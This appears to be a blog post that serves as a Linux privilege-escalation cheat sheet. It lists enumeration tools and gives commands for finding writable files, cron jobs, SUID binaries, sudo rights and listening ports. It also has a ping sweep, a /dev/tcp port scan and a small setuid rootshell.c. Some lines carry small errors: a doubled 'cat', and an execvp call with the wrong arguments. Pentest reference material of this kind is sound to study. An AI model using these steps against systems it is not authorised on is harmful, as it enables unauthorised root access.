Posted Sep 22, 2019 2019-09-22T00:00:00+01:00 by mlcsec
Updated Dec 5, 2020 2020-12-05T12:09:34+00:00
Small collection of Linux privilege escalation scripts, references and commands.
Scripts
LinEnum.sh
Private-i.sh
LinPeas.sh
pspy
LinuxPrivChecker.py
Linux-Exploit-Suggester.sh
References
GTFOBins
Linux - Privilege Escalation
Basic Linux Privilege Escalation
General
OS
1
2
3
4
5
| cat /etc/issue
cat cat /etc/*-release
cat /proc/version
uname -a
|
Files
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| find / -readable 2>/dev/null //find all readable files
find / -user <username> //find all files of username
find / -group <groupname> 2>/dev/null //find all files of groupname
find / -name <filename> //find filename
find / -type f -name "*.conf" //find all .conf files
find /etc -type f -name "*.conf" //find all .conf files in /etc
find / -newermt <start-date> ! -newermt <end-date> 2>/dev/null //find all modified files
find targetdir/ -name '*.<extension>' -exec cat {} \; > out.txt // find all files with <extension> and cat into out.txt
cat out.txt | grep <keyword>
find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev' // startup scripts
find / -writable -type d 2>/dev/null // writable dirs
|
Cronjobs
1
2
3
4
5
6
| crontab -l //list current crontab
cat /etc/crontab //check system wide crontab
ls -la /etc/cron*
crontab -e //edit current crontab
|
Check capabilities
1
2
3
4
5
6
7
8
9
| getcap -r /
+ep - Adding capability
-ep - Removing capability
There are 3 modes:
• e: EffectiveThis means the capability is "activated".
• p: PermittedThis means the capability can be used/is allowed.
• i: InheritedThe capability is kept by child/subprocesses upon execve() for example.
|
Running processes/services
1
2
3
4
5
6
7
| ps aux
ps -ef
ps aux | grep root
ps -ef | grep root
top
cat /etc/services
|
Running daemons
1
| ps -eo 'tty,pid,comm' | grep ^? //all
|
Listening ports
1
2
3
4
| netstat -an | grep 'LISTEN'
lsof -i -P -n | grep LISTEN
ss -tulw
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
|
Firewall rules
1
2
| cat /etc/iptables/rules.v4
cat /etc/iptables/rules.v6
|
Sudo configuration
1
2
| sudo -l
cat /etc/sudoers
|
Vulnerable binaries
1
2
| find / -perm -u=s -type f 2>/dev/null //SUID
find / -perm -g=s -type f 2>/dev/null //GUID
|
Ping sweep
1
| for i in {1..254} ;do (ping -c 1 x.x.x.$i | grep "bytes from" &) ;done
|
Port scan
1
| for p in {1..1024}; do(echo >/dev/tcp/<ip>/$p) >/dev/null 2>&1 && echo "$p open"; done
|
rootshell.c
1
2
3
4
5
6
7
8
| #include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
|
